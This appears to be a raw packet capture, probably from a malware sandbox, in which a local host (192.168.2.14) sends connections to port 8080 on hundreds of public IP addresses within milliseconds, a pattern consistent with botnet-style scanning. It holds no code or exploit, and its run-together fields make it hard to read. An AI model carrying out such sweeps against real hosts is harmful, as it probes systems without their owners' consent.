                                              Nov 23, 2023 05:14:49.029330015 CET478168080192.168.2.1485.101.110.78
                                              Nov 23, 2023 05:14:49.029331923 CET478168080192.168.2.1431.170.1.254
                                              Nov 23, 2023 05:14:49.029331923 CET478168080192.168.2.1485.180.195.144
                                              Nov 23, 2023 05:14:49.029347897 CET478168080192.168.2.1485.134.28.246
                                              Nov 23, 2023 05:14:49.029350042 CET478168080192.168.2.1462.240.6.120
                                              Nov 23, 2023 05:14:49.029366970 CET478168080192.168.2.1494.105.21.167
                                              Nov 23, 2023 05:14:49.029366970 CET478168080192.168.2.1495.24.60.187
                                              Nov 23, 2023 05:14:49.029386044 CET478168080192.168.2.1431.37.8.38
                                              Nov 23, 2023 05:14:49.029397964 CET478168080192.168.2.1495.244.189.164
                                              Nov 23, 2023 05:14:49.029397964 CET478168080192.168.2.1462.99.43.112
                                              Nov 23, 2023 05:14:49.029405117 CET478168080192.168.2.1495.120.242.105
                                              Nov 23, 2023 05:14:49.029413939 CET478168080192.168.2.1431.74.133.60
                                              Nov 23, 2023 05:14:49.029421091 CET478168080192.168.2.1494.239.72.147
                                              Nov 23, 2023 05:14:49.029421091 CET478168080192.168.2.1462.148.15.162
                                              Nov 23, 2023 05:14:49.029448986 CET478168080192.168.2.1495.16.34.186
                                              Nov 23, 2023 05:14:49.029463053 CET478168080192.168.2.1485.217.106.71
                                              Nov 23, 2023 05:14:49.029463053 CET478168080192.168.2.1494.118.47.210
                                              Nov 23, 2023 05:14:49.029468060 CET478168080192.168.2.1494.165.133.116
                                              Nov 23, 2023 05:14:49.029468060 CET478168080192.168.2.1495.58.187.87
                                              Nov 23, 2023 05:14:49.029468060 CET478168080192.168.2.1462.245.43.165
                                              Nov 23, 2023 05:14:49.029468060 CET478168080192.168.2.1431.179.5.37
                                              Nov 23, 2023 05:14:49.029478073 CET478168080192.168.2.1462.24.181.171
                                              Nov 23, 2023 05:14:49.029494047 CET478168080192.168.2.1494.252.26.137
                                              Nov 23, 2023 05:14:49.029494047 CET478168080192.168.2.1431.155.213.53
                                              Nov 23, 2023 05:14:49.029515982 CET478168080192.168.2.1494.76.207.220
                                              Nov 23, 2023 05:14:49.029529095 CET478168080192.168.2.1495.62.21.248
                                              Nov 23, 2023 05:14:49.029534101 CET478168080192.168.2.1462.208.240.208
                                              Nov 23, 2023 05:14:49.029534101 CET478168080192.168.2.1494.188.11.166
                                              Nov 23, 2023 05:14:49.029582024 CET478168080192.168.2.1495.223.51.137
                                              Nov 23, 2023 05:14:49.029584885 CET478168080192.168.2.1495.58.169.168
                                              Nov 23, 2023 05:14:49.029584885 CET478168080192.168.2.1431.99.34.81
                                              Nov 23, 2023 05:14:49.029586077 CET478168080192.168.2.1485.127.6.54
                                              Nov 23, 2023 05:14:49.029586077 CET478168080192.168.2.1495.167.247.102
                                              Nov 23, 2023 05:14:49.029586077 CET478168080192.168.2.1462.217.204.32
                                              Nov 23, 2023 05:14:49.029603004 CET478168080192.168.2.1462.106.113.70
                                              Nov 23, 2023 05:14:49.029603004 CET478168080192.168.2.1431.94.131.28
                                              Nov 23, 2023 05:14:49.029617071 CET478168080192.168.2.1485.210.177.145
                                              Nov 23, 2023 05:14:49.029617071 CET478168080192.168.2.1494.234.109.187
                                              Nov 23, 2023 05:14:49.029617071 CET478168080192.168.2.1431.65.82.183
                                              Nov 23, 2023 05:14:49.029620886 CET478168080192.168.2.1485.135.95.252
                                              Nov 23, 2023 05:14:49.029620886 CET478168080192.168.2.1485.33.226.46
                                              Nov 23, 2023 05:14:49.029628038 CET478168080192.168.2.1485.81.70.64
                                              Nov 23, 2023 05:14:49.029632092 CET478168080192.168.2.1494.113.25.120
                                              Nov 23, 2023 05:14:49.029632092 CET478168080192.168.2.1485.178.22.219
                                              Nov 23, 2023 05:14:49.029650927 CET478168080192.168.2.1431.78.128.176
                                              Nov 23, 2023 05:14:49.029659033 CET478168080192.168.2.1485.47.54.153
                                              Nov 23, 2023 05:14:49.029659033 CET478168080192.168.2.1494.178.29.118
                                              Nov 23, 2023 05:14:49.029669046 CET478168080192.168.2.1462.106.76.176
                                              Nov 23, 2023 05:14:49.029674053 CET478168080192.168.2.1485.5.33.125
                                              Nov 23, 2023 05:14:49.029684067 CET478168080192.168.2.1462.99.203.75
                                              Nov 23, 2023 05:14:49.029701948 CET478168080192.168.2.1494.115.246.109
                                              Nov 23, 2023 05:14:49.029706955 CET478168080192.168.2.1485.120.177.234
                                              Nov 23, 2023 05:14:49.029706955 CET478168080192.168.2.1431.8.160.225
                                              Nov 23, 2023 05:14:49.029716015 CET478168080192.168.2.1462.47.202.70
                                              Nov 23, 2023 05:14:49.029730082 CET478168080192.168.2.1462.221.244.78
                                              Nov 23, 2023 05:14:49.029733896 CET478168080192.168.2.1462.75.188.187
                                              Nov 23, 2023 05:14:49.029747963 CET478168080192.168.2.1495.80.148.34
                                              Nov 23, 2023 05:14:49.029752016 CET478168080192.168.2.1431.215.186.47
                                              Nov 23, 2023 05:14:49.029752016 CET478168080192.168.2.1431.172.178.138
                                              Nov 23, 2023 05:14:49.029752970 CET478168080192.168.2.1462.200.65.242
                                              Nov 23, 2023 05:14:49.029772997 CET478168080192.168.2.1431.185.223.255
                                              Nov 23, 2023 05:14:49.029799938 CET478168080192.168.2.1494.59.197.248
                                              Nov 23, 2023 05:14:49.029799938 CET478168080192.168.2.1495.9.39.174
                                              Nov 23, 2023 05:14:49.029814959 CET478168080192.168.2.1462.173.210.82
                                              Nov 23, 2023 05:14:49.029827118 CET478168080192.168.2.1495.180.1.102
                                              Nov 23, 2023 05:14:49.029835939 CET478168080192.168.2.1485.180.123.121
                                              Nov 23, 2023 05:14:49.029843092 CET478168080192.168.2.1485.78.140.35
                                              Nov 23, 2023 05:14:49.029843092 CET478168080192.168.2.1462.0.38.240
                                              Nov 23, 2023 05:14:49.029845953 CET478168080192.168.2.1494.230.202.166
                                              Nov 23, 2023 05:14:49.029853106 CET478168080192.168.2.1494.214.107.148
                                              Nov 23, 2023 05:14:49.029853106 CET478168080192.168.2.1495.131.83.209
                                              Nov 23, 2023 05:14:49.029870033 CET478168080192.168.2.1495.7.172.10
                                              Nov 23, 2023 05:14:49.029880047 CET478168080192.168.2.1431.26.189.157
                                              Nov 23, 2023 05:14:49.029880047 CET478168080192.168.2.1494.106.242.221
                                              Nov 23, 2023 05:14:49.029920101 CET478168080192.168.2.1462.72.185.106
                                              Nov 23, 2023 05:14:49.029920101 CET478168080192.168.2.1495.149.240.124
                                              Nov 23, 2023 05:14:49.029925108 CET478168080192.168.2.1494.127.254.109
                                              Nov 23, 2023 05:14:49.029927969 CET478168080192.168.2.1431.95.22.248
                                              Nov 23, 2023 05:14:49.029939890 CET478168080192.168.2.1431.97.132.233
                                              Nov 23, 2023 05:14:49.029941082 CET478168080192.168.2.1462.214.173.0
                                              Nov 23, 2023 05:14:49.029941082 CET478168080192.168.2.1494.238.148.151
                                              Nov 23, 2023 05:14:49.029941082 CET478168080192.168.2.1485.81.172.182
                                              Nov 23, 2023 05:14:49.029944897 CET478168080192.168.2.1431.115.131.248
                                              Nov 23, 2023 05:14:49.029944897 CET478168080192.168.2.1462.81.113.30
                                              Nov 23, 2023 05:14:49.029958010 CET478168080192.168.2.1494.181.115.57
                                              Nov 23, 2023 05:14:49.029967070 CET478168080192.168.2.1495.113.7.149
                                              Nov 23, 2023 05:14:49.029968977 CET478168080192.168.2.1494.73.17.78
                                              Nov 23, 2023 05:14:49.029998064 CET478168080192.168.2.1495.134.85.164
                                              Nov 23, 2023 05:14:49.030006886 CET478168080192.168.2.1485.18.11.161
                                              Nov 23, 2023 05:14:49.030006886 CET478168080192.168.2.1495.214.197.59
                                              Nov 23, 2023 05:14:49.030024052 CET478168080192.168.2.1494.118.102.44
                                              Nov 23, 2023 05:14:49.030024052 CET478168080192.168.2.1485.218.59.32
                                              Nov 23, 2023 05:14:49.030024052 CET478168080192.168.2.1494.105.234.16
                                              Nov 23, 2023 05:14:49.030051947 CET478168080192.168.2.1462.231.113.103
                                              Nov 23, 2023 05:14:49.030052900 CET478168080192.168.2.1495.46.110.105
                                              Nov 23, 2023 05:14:49.030056000 CET478168080192.168.2.1495.66.36.69
                                              Nov 23, 2023 05:14:49.030056000 CET478168080192.168.2.1485.156.52.76
                                              Nov 23, 2023 05:14:49.030056000 CET478168080192.168.2.1431.72.241.106
                                              Nov 23, 2023 05:14:49.030056000 CET478168080192.168.2.1485.13.244.148
                                              Nov 23, 2023 05:14:49.030056000 CET478168080192.168.2.1495.127.234.38
                                              Nov 23, 2023 05:14:49.030070066 CET478168080192.168.2.1462.151.227.5
                                              Nov 23, 2023 05:14:49.030083895 CET478168080192.168.2.1494.17.238.173
                                              Nov 23, 2023 05:14:49.030083895 CET478168080192.168.2.1462.19.128.84
                                              Nov 23, 2023 05:14:49.030087948 CET478168080192.168.2.1495.81.50.53
                                              Nov 23, 2023 05:14:49.030093908 CET478168080192.168.2.1495.234.10.132
                                              Nov 23, 2023 05:14:49.030098915 CET478168080192.168.2.1462.44.15.199
                                              Nov 23, 2023 05:14:49.030117035 CET478168080192.168.2.1485.173.115.114
                                              Nov 23, 2023 05:14:49.030131102 CET478168080192.168.2.1494.248.90.105
                                              Nov 23, 2023 05:14:49.030143023 CET478168080192.168.2.1485.246.110.46
                                              Nov 23, 2023 05:14:49.030167103 CET478168080192.168.2.1495.30.191.208
                                              Nov 23, 2023 05:14:49.030168056 CET478168080192.168.2.1431.244.253.103
                                              Nov 23, 2023 05:14:49.030170918 CET478168080192.168.2.1495.70.32.204
                                              Nov 23, 2023 05:14:49.030170918 CET478168080192.168.2.1485.5.82.192
                                              Nov 23, 2023 05:14:49.030188084 CET478168080192.168.2.1431.217.118.76
                                              Nov 23, 2023 05:14:49.030211926 CET478168080192.168.2.1462.36.166.248
                                              Nov 23, 2023 05:14:49.030229092 CET478168080192.168.2.1462.186.34.142
                                              Nov 23, 2023 05:14:49.030229092 CET478168080192.168.2.1495.142.239.219
                                              Nov 23, 2023 05:14:49.030255079 CET478168080192.168.2.1462.13.19.224
                                              Nov 23, 2023 05:14:49.030255079 CET478168080192.168.2.1495.204.116.79
                                              Nov 23, 2023 05:14:49.030271053 CET478168080192.168.2.1485.86.144.135
                                              Nov 23, 2023 05:14:49.030281067 CET478168080192.168.2.1494.6.88.56
                                              Nov 23, 2023 05:14:49.030302048 CET478168080192.168.2.1485.221.230.24
                                              Nov 23, 2023 05:14:49.030302048 CET478168080192.168.2.1462.207.37.216
                                              Nov 23, 2023 05:14:49.030329943 CET478168080192.168.2.1462.34.64.178
                                              Nov 23, 2023 05:14:49.030337095 CET478168080192.168.2.1485.164.155.198
                                              Nov 23, 2023 05:14:49.030361891 CET478168080192.168.2.1485.100.91.72
                                              Nov 23, 2023 05:14:49.030361891 CET478168080192.168.2.1431.7.220.24
                                              Nov 23, 2023 05:14:49.030361891 CET478168080192.168.2.1494.209.101.105
                                              Nov 23, 2023 05:14:49.030361891 CET478168080192.168.2.1462.240.154.230
                                              Nov 23, 2023 05:14:49.030364037 CET478168080192.168.2.1495.118.32.184
                                              Nov 23, 2023 05:14:49.030364990 CET478168080192.168.2.1495.201.8.113
                                              Nov 23, 2023 05:14:49.030366898 CET478168080192.168.2.1462.95.18.114
                                              Nov 23, 2023 05:14:49.030366898 CET478168080192.168.2.1431.71.209.8
                                              Nov 23, 2023 05:14:49.030366898 CET478168080192.168.2.1431.130.28.190
                                              Nov 23, 2023 05:14:49.030366898 CET478168080192.168.2.1462.197.9.113
                                              Nov 23, 2023 05:14:49.030369997 CET478168080192.168.2.1485.77.73.130
                                              Nov 23, 2023 05:14:49.030370951 CET478168080192.168.2.1431.112.209.38
                                              Nov 23, 2023 05:14:49.030370951 CET478168080192.168.2.1431.105.14.62
                                              Nov 23, 2023 05:14:49.030388117 CET478168080192.168.2.1431.172.83.34
                                              Nov 23, 2023 05:14:49.030388117 CET478168080192.168.2.1485.155.33.71
                                              Nov 23, 2023 05:14:49.030394077 CET478168080192.168.2.1494.55.173.164
                                              Nov 23, 2023 05:14:49.030407906 CET478168080192.168.2.1495.159.165.91
                                              Nov 23, 2023 05:14:49.030457020 CET478168080192.168.2.1494.135.42.119
                                              Nov 23, 2023 05:14:49.030477047 CET478168080192.168.2.1431.148.176.234
                                              Nov 23, 2023 05:14:49.030477047 CET478168080192.168.2.1431.77.233.97
                                              Nov 23, 2023 05:14:49.030493021 CET478168080192.168.2.1485.210.248.9
                                              Nov 23, 2023 05:14:49.030498028 CET478168080192.168.2.1485.73.185.199
                                              Nov 23, 2023 05:14:49.030498028 CET478168080192.168.2.1494.245.6.213
                                              Nov 23, 2023 05:14:49.030499935 CET478168080192.168.2.1494.119.71.136
                                              Nov 23, 2023 05:14:49.030499935 CET478168080192.168.2.1495.126.97.91
                                              Nov 23, 2023 05:14:49.030514002 CET478168080192.168.2.1431.202.198.31
                                              Nov 23, 2023 05:14:49.030530930 CET478168080192.168.2.1431.12.31.203
                                              Nov 23, 2023 05:14:49.030530930 CET478168080192.168.2.1485.120.95.242
                                              Nov 23, 2023 05:14:49.030530930 CET478168080192.168.2.1494.101.121.207
                                              Nov 23, 2023 05:14:49.030533075 CET478168080192.168.2.1431.30.208.147
                                              Nov 23, 2023 05:14:49.030536890 CET478168080192.168.2.1485.104.135.24
                                              Nov 23, 2023 05:14:49.030548096 CET478168080192.168.2.1494.11.101.153
                                              Nov 23, 2023 05:14:49.030549049 CET478168080192.168.2.1495.107.44.17
                                              Nov 23, 2023 05:14:49.030551910 CET478168080192.168.2.1495.229.36.101
                                              Nov 23, 2023 05:14:49.030575991 CET478168080192.168.2.1485.231.4.161
                                              Nov 23, 2023 05:14:49.030575991 CET478168080192.168.2.1494.129.0.2
                                              Nov 23, 2023 05:14:49.030589104 CET478168080192.168.2.1494.162.207.187
                                              Nov 23, 2023 05:14:49.030590057 CET478168080192.168.2.1494.67.92.163
                                              Nov 23, 2023 05:14:49.030589104 CET478168080192.168.2.1462.91.1.203
                                              Nov 23, 2023 05:14:49.030603886 CET478168080192.168.2.1431.180.79.170
                                              Nov 23, 2023 05:14:49.030631065 CET478168080192.168.2.1494.239.162.130
                                              Nov 23, 2023 05:14:49.030631065 CET478168080192.168.2.1485.98.57.240
                                              Nov 23, 2023 05:14:49.030656099 CET478168080192.168.2.1494.161.187.238
                                              Nov 23, 2023 05:14:49.030664921 CET478168080192.168.2.1495.233.229.225
                                              Nov 23, 2023 05:14:49.030664921 CET478168080192.168.2.1462.176.50.75
                                              Nov 23, 2023 05:14:49.030680895 CET478168080192.168.2.1431.147.172.198
                                              Nov 23, 2023 05:14:49.030683041 CET478168080192.168.2.1431.1.44.190
                                              Nov 23, 2023 05:14:49.030683041 CET478168080192.168.2.1462.10.121.7
                                              Nov 23, 2023 05:14:49.030710936 CET478168080192.168.2.1462.245.152.184
                                              Nov 23, 2023 05:14:49.030710936 CET478168080192.168.2.1495.178.9.172
                                              Nov 23, 2023 05:14:49.030710936 CET478168080192.168.2.1431.123.97.90
                                              Nov 23, 2023 05:14:49.030714989 CET478168080192.168.2.1431.196.30.28
                                              Nov 23, 2023 05:14:49.030714989 CET478168080192.168.2.1494.79.254.243
                                              Nov 23, 2023 05:14:49.030714989 CET478168080192.168.2.1495.212.157.186
                                              Nov 23, 2023 05:14:49.030730009 CET478168080192.168.2.1495.117.88.134
                                              Nov 23, 2023 05:14:49.030731916 CET478168080192.168.2.1494.47.151.179
                                              Nov 23, 2023 05:14:49.030735016 CET478168080192.168.2.1485.156.209.149
                                              Nov 23, 2023 05:14:49.030735970 CET478168080192.168.2.1431.30.84.107
                                              Nov 23, 2023 05:14:49.030746937 CET478168080192.168.2.1494.246.6.238
                                              Nov 23, 2023 05:14:49.030761957 CET478168080192.168.2.1495.53.125.136
                                              Nov 23, 2023 05:14:49.030771971 CET478168080192.168.2.1494.242.74.247
                                              Nov 23, 2023 05:14:49.030793905 CET478168080192.168.2.1431.14.58.2
                                              Nov 23, 2023 05:14:49.030805111 CET478168080192.168.2.1495.11.166.38
                                              Nov 23, 2023 05:14:49.030805111 CET478168080192.168.2.1431.65.200.213
                                              Nov 23, 2023 05:14:49.030816078 CET478168080192.168.2.1431.54.108.166
                                              Nov 23, 2023 05:14:49.030823946 CET478168080192.168.2.1495.1.70.180
                                              Nov 23, 2023 05:14:49.030827045 CET478168080192.168.2.1462.118.33.214
                                              Nov 23, 2023 05:14:49.030827045 CET478168080192.168.2.1462.205.24.132
                                              Nov 23, 2023 05:14:49.030827045 CET478168080192.168.2.1495.37.57.166
                                              Nov 23, 2023 05:14:49.030831099 CET478168080192.168.2.1462.243.184.41
                                              Nov 23, 2023 05:14:49.030833006 CET478168080192.168.2.1494.50.133.138
                                              Nov 23, 2023 05:14:49.030847073 CET478168080192.168.2.1495.174.196.130
                                              Nov 23, 2023 05:14:49.030860901 CET478168080192.168.2.1495.62.51.34
                                              Nov 23, 2023 05:14:49.030860901 CET478168080192.168.2.1431.44.105.104
                                              Nov 23, 2023 05:14:49.030864954 CET478168080192.168.2.1495.36.190.39
                                              Nov 23, 2023 05:14:49.030885935 CET478168080192.168.2.1494.215.247.70
                                              Nov 23, 2023 05:14:49.030900002 CET478168080192.168.2.1495.143.149.32
                                              Nov 23, 2023 05:14:49.030900002 CET478168080192.168.2.1494.142.198.63
                                              Nov 23, 2023 05:14:49.030911922 CET478168080192.168.2.1495.182.249.145
                                              Nov 23, 2023 05:14:49.030911922 CET478168080192.168.2.1495.105.168.39
                                              Nov 23, 2023 05:14:49.030925035 CET478168080192.168.2.1485.1.91.89
                                              Nov 23, 2023 05:14:49.030925989 CET478168080192.168.2.1462.42.140.202
                                              Nov 23, 2023 05:14:49.030937910 CET478168080192.168.2.1495.183.165.87
                                              Nov 23, 2023 05:14:49.030949116 CET478168080192.168.2.1495.183.83.222
                                              Nov 23, 2023 05:14:49.030967951 CET478168080192.168.2.1495.203.0.101
                                              Nov 23, 2023 05:14:49.030972958 CET478168080192.168.2.1431.135.81.211
                                              Nov 23, 2023 05:14:49.030972958 CET478168080192.168.2.1485.41.64.154
                                              Nov 23, 2023 05:14:49.030987978 CET478168080192.168.2.1462.215.5.136
                                              Nov 23, 2023 05:14:49.030987978 CET478168080192.168.2.1495.250.61.173
                                              Nov 23, 2023 05:14:49.031013966 CET478168080192.168.2.1485.128.32.154
                                              Nov 23, 2023 05:14:49.031018019 CET478168080192.168.2.1462.227.225.204
                                              Nov 23, 2023 05:14:49.031033039 CET478168080192.168.2.1485.230.31.165
                                              Nov 23, 2023 05:14:49.031035900 CET478168080192.168.2.1431.55.11.48
                                              Nov 23, 2023 05:14:49.031035900 CET478168080192.168.2.1431.104.21.87
                                              Nov 23, 2023 05:14:49.031037092 CET478168080192.168.2.1494.237.10.96
                                              Nov 23, 2023 05:14:49.031037092 CET478168080192.168.2.1431.186.132.133
                                              Nov 23, 2023 05:14:49.031050920 CET478168080192.168.2.1485.229.177.249
                                              Nov 23, 2023 05:14:49.031052113 CET478168080192.168.2.1494.193.38.66
                                              Nov 23, 2023 05:14:49.031052113 CET478168080192.168.2.1431.84.225.13
                                              Nov 23, 2023 05:14:49.031065941 CET478168080192.168.2.1485.244.235.38
                                              Nov 23, 2023 05:14:49.031078100 CET478168080192.168.2.1462.117.215.106
                                              Nov 23, 2023 05:14:49.031106949 CET478168080192.168.2.1462.242.230.135
                                              Nov 23, 2023 05:14:49.031111002 CET478168080192.168.2.1485.93.132.149
                                              Nov 23, 2023 05:14:49.031111956 CET478168080192.168.2.1485.69.232.151
                                              Nov 23, 2023 05:14:49.031119108 CET478168080192.168.2.1431.171.123.125
                                              Nov 23, 2023 05:14:49.031130075 CET478168080192.168.2.1495.162.243.5
                                              Nov 23, 2023 05:14:49.031137943 CET478168080192.168.2.1462.115.198.88
                                              Nov 23, 2023 05:14:49.031150103 CET478168080192.168.2.1495.249.102.34
                                              Nov 23, 2023 05:14:49.031152964 CET478168080192.168.2.1462.182.84.107
                                              Nov 23, 2023 05:14:49.031169891 CET478168080192.168.2.1495.83.58.192
                                              Nov 23, 2023 05:14:49.031171083 CET478168080192.168.2.1495.20.86.222
                                              Nov 23, 2023 05:14:49.031173944 CET478168080192.168.2.1485.61.23.103
                                              Nov 23, 2023 05:14:49.031174898 CET478168080192.168.2.1485.42.239.151
                                              Nov 23, 2023 05:14:49.031176090 CET478168080192.168.2.1431.210.98.211
                                              Nov 23, 2023 05:14:49.031188011 CET478168080192.168.2.1494.172.39.107
                                              Nov 23, 2023 05:14:49.031204939 CET478168080192.168.2.1494.150.212.200
                                              Nov 23, 2023 05:14:49.031219959 CET478168080192.168.2.1462.157.247.144
                                              Nov 23, 2023 05:14:49.031219959 CET478168080192.168.2.1494.242.117.29
                                              Nov 23, 2023 05:14:49.031222105 CET478168080192.168.2.1462.170.132.249
                                              Nov 23, 2023 05:14:49.031249046 CET478168080192.168.2.1494.179.198.179
                                              Nov 23, 2023 05:14:49.031265974 CET478168080192.168.2.1494.225.198.119
                                              Nov 23, 2023 05:14:49.031267881 CET478168080192.168.2.1431.106.204.129
                                              Nov 23, 2023 05:14:49.031269073 CET478168080192.168.2.1431.229.68.72
                                              Nov 23, 2023 05:14:49.031289101 CET478168080192.168.2.1431.168.198.194
                                              Nov 23, 2023 05:14:49.031291962 CET478168080192.168.2.1494.63.68.175
                                              Nov 23, 2023 05:14:49.031291962 CET478168080192.168.2.1485.141.125.131
                                              Nov 23, 2023 05:14:49.031292915 CET478168080192.168.2.1495.245.180.73
                                              Nov 23, 2023 05:14:49.031291962 CET478168080192.168.2.1495.249.160.251
                                              Nov 23, 2023 05:14:49.031291962 CET478168080192.168.2.1431.35.59.153
                                              Nov 23, 2023 05:14:49.031294107 CET478168080192.168.2.1495.227.205.193
                                              Nov 23, 2023 05:14:49.031294107 CET478168080192.168.2.1485.89.226.199
                                              Nov 23, 2023 05:14:49.031323910 CET478168080192.168.2.1485.220.106.184
                                              Nov 23, 2023 05:14:49.031323910 CET478168080192.168.2.1494.136.89.233
                                              Nov 23, 2023 05:14:49.031323910 CET478168080192.168.2.1431.124.181.239
                                              Nov 23, 2023 05:14:49.031336069 CET478168080192.168.2.1495.146.250.189
                                              Nov 23, 2023 05:14:49.031351089 CET478168080192.168.2.1462.245.113.233
                                              Nov 23, 2023 05:14:49.031362057 CET478168080192.168.2.1494.232.83.34
                                              Nov 23, 2023 05:14:49.031363964 CET478168080192.168.2.1462.28.19.151
                                              Nov 23, 2023 05:14:49.031364918 CET478168080192.168.2.1494.154.233.195
                                              Nov 23, 2023 05:14:49.031394958 CET478168080192.168.2.1462.164.236.174
                                              Nov 23, 2023 05:14:49.031394958 CET478168080192.168.2.1485.190.193.180
                                              Nov 23, 2023 05:14:49.031400919 CET478168080192.168.2.1495.247.160.211
                                              Nov 23, 2023 05:14:49.031400919 CET478168080192.168.2.1494.174.223.10
                                              Nov 23, 2023 05:14:49.031400919 CET478168080192.168.2.1485.187.177.16
                                              Nov 23, 2023 05:14:49.031404972 CET478168080192.168.2.1494.96.133.18
                                              Nov 23, 2023 05:14:49.031408072 CET478168080192.168.2.1462.253.144.22
                                              Nov 23, 2023 05:14:49.031409025 CET478168080192.168.2.1495.148.178.20
                                              Nov 23, 2023 05:14:49.031411886 CET478168080192.168.2.1494.121.186.157
                                              Nov 23, 2023 05:14:49.031411886 CET478168080192.168.2.1495.174.170.254
                                              Nov 23, 2023 05:14:49.031415939 CET478168080192.168.2.1431.181.239.234
                                              Nov 23, 2023 05:14:49.031415939 CET478168080192.168.2.1431.190.108.117
                                              Nov 23, 2023 05:14:49.031424999 CET478168080192.168.2.1495.87.217.88
                                              Nov 23, 2023 05:14:49.031440020 CET478168080192.168.2.1462.48.83.193
                                              Nov 23, 2023 05:14:49.031441927 CET478168080192.168.2.1494.92.117.219
                                              Nov 23, 2023 05:14:49.031459093 CET478168080192.168.2.1431.119.180.42
                                              Nov 23, 2023 05:14:49.031461000 CET478168080192.168.2.1495.135.216.27
                                              Nov 23, 2023 05:14:49.031462908 CET478168080192.168.2.1462.165.196.193
                                              Nov 23, 2023 05:14:49.031466007 CET478168080192.168.2.1485.121.182.65
                                              Nov 23, 2023 05:14:49.031466007 CET478168080192.168.2.1495.17.115.102
                                              Nov 23, 2023 05:14:49.031478882 CET478168080192.168.2.1485.203.170.71
                                              Nov 23, 2023 05:14:49.031498909 CET478168080192.168.2.1462.164.28.13
                                              Nov 23, 2023 05:14:49.031500101 CET478168080192.168.2.1495.238.163.34
                                              Nov 23, 2023 05:14:49.031502008 CET478168080192.168.2.1462.201.185.135
                                              Nov 23, 2023 05:14:49.031519890 CET478168080192.168.2.1485.112.192.129
                                              Nov 23, 2023 05:14:49.031533957 CET478168080192.168.2.1494.149.202.64
                                              Nov 23, 2023 05:14:49.031537056 CET478168080192.168.2.1495.231.119.235
                                              Nov 23, 2023 05:14:49.031569958 CET478168080192.168.2.1494.209.244.71
                                              Nov 23, 2023 05:14:49.031574965 CET478168080192.168.2.1485.83.158.211
                                              Nov 23, 2023 05:14:49.031591892 CET478168080192.168.2.1431.66.238.202
                                              Nov 23, 2023 05:14:49.031598091 CET478168080192.168.2.1462.105.152.255
                                              Nov 23, 2023 05:14:49.031609058 CET478168080192.168.2.1495.71.39.198
                                              Nov 23, 2023 05:14:49.031616926 CET478168080192.168.2.1494.2.151.163
                                              Nov 23, 2023 05:14:49.031640053 CET478168080192.168.2.1431.217.239.190
                                              Nov 23, 2023 05:14:49.031655073 CET478168080192.168.2.1494.248.106.40
                                              Nov 23, 2023 05:14:49.031655073 CET478168080192.168.2.1431.144.113.12
                                              Nov 23, 2023 05:14:49.031655073 CET478168080192.168.2.1431.211.251.234
                                              Nov 23, 2023 05:14:49.031656027 CET478168080192.168.2.1485.180.31.130
                                              Nov 23, 2023 05:14:49.031656981 CET478168080192.168.2.1495.67.184.131
                                              Nov 23, 2023 05:14:49.031656027 CET478168080192.168.2.1494.76.91.204
                                              Nov 23, 2023 05:14:49.031656981 CET478168080192.168.2.1431.47.161.87
                                              Nov 23, 2023 05:14:49.031662941 CET478168080192.168.2.1462.166.197.151
                                              Nov 23, 2023 05:14:49.031668901 CET478168080192.168.2.1431.40.147.123
                                              Nov 23, 2023 05:14:49.031670094 CET478168080192.168.2.1485.78.66.205
                                              Nov 23, 2023 05:14:49.031670094 CET478168080192.168.2.1431.131.194.172
                                              Nov 23, 2023 05:14:49.031662941 CET478168080192.168.2.1494.132.138.193
                                              Nov 23, 2023 05:14:49.031662941 CET478168080192.168.2.1462.237.250.191
                                              Nov 23, 2023 05:14:49.031686068 CET478168080192.168.2.1485.177.145.231
                                              Nov 23, 2023 05:14:49.031689882 CET478168080192.168.2.1431.250.216.104
                                              Nov 23, 2023 05:14:49.031703949 CET478168080192.168.2.1495.99.86.82
                                              Nov 23, 2023 05:14:49.031703949 CET478168080192.168.2.1495.175.224.156
                                              Nov 23, 2023 05:14:49.031703949 CET478168080192.168.2.1494.120.12.111
                                              Nov 23, 2023 05:14:49.031703949 CET478168080192.168.2.1495.135.222.254
                                              Nov 23, 2023 05:14:49.031718016 CET478168080192.168.2.1485.91.191.113
                                              Nov 23, 2023 05:14:49.031728983 CET478168080192.168.2.1494.125.194.27
                                              Nov 23, 2023 05:14:49.031738997 CET478168080192.168.2.1431.127.12.155
                                              Nov 23, 2023 05:14:49.031747103 CET478168080192.168.2.1494.252.186.113
                                              Nov 23, 2023 05:14:49.031747103 CET478168080192.168.2.1431.208.162.160
                                              Nov 23, 2023 05:14:49.031763077 CET478168080192.168.2.1495.219.196.161
                                              Nov 23, 2023 05:14:49.031769037 CET478168080192.168.2.1495.237.75.30
                                              Nov 23, 2023 05:14:49.031780958 CET478168080192.168.2.1494.229.70.33
                                              Nov 23, 2023 05:14:49.031799078 CET478168080192.168.2.1494.188.81.72
                                              Nov 23, 2023 05:14:49.031799078 CET478168080192.168.2.1494.142.175.84
                                              Nov 23, 2023 05:14:49.031799078 CET478168080192.168.2.1495.124.129.249
                                              Nov 23, 2023 05:14:49.031825066 CET478168080192.168.2.1494.131.145.204
                                              Nov 23, 2023 05:14:49.031827927 CET478168080192.168.2.1494.72.82.180
                                              Nov 23, 2023 05:14:49.031841040 CET478168080192.168.2.1431.57.50.145
                                              Nov 23, 2023 05:14:49.031857014 CET478168080192.168.2.1431.137.232.123
                                              Nov 23, 2023 05:14:49.031857014 CET478168080192.168.2.1462.239.190.15
                                              Nov 23, 2023 05:14:49.031857014 CET478168080192.168.2.1485.56.24.141
                                              Nov 23, 2023 05:14:49.031857014 CET478168080192.168.2.1494.164.16.99
                                              Nov 23, 2023 05:14:49.031857014 CET478168080192.168.2.1485.220.254.243
                                              Nov 23, 2023 05:14:49.031858921 CET478168080192.168.2.1495.86.250.193
                                              Nov 23, 2023 05:14:49.031858921 CET478168080192.168.2.1494.216.189.10
                                              Nov 23, 2023 05:14:49.031882048 CET478168080192.168.2.1431.44.175.97
                                              Nov 23, 2023 05:14:49.031882048 CET478168080192.168.2.1462.12.14.33
                                              Nov 23, 2023 05:14:49.031882048 CET478168080192.168.2.1485.125.250.97
                                              Nov 23, 2023 05:14:49.031898022 CET478168080192.168.2.1494.2.213.231
                                              Nov 23, 2023 05:14:49.031908035 CET478168080192.168.2.1462.169.166.147
                                              Nov 23, 2023 05:14:49.031908989 CET478168080192.168.2.1495.33.14.27
                                              Nov 23, 2023 05:14:49.031934977 CET478168080192.168.2.1494.170.51.234
                                              Nov 23, 2023 05:14:49.031950951 CET478168080192.168.2.1494.37.20.15
                                              Nov 23, 2023 05:14:49.031950951 CET478168080192.168.2.1485.51.233.13
                                              Nov 23, 2023 05:14:49.031956911 CET478168080192.168.2.1431.111.127.208
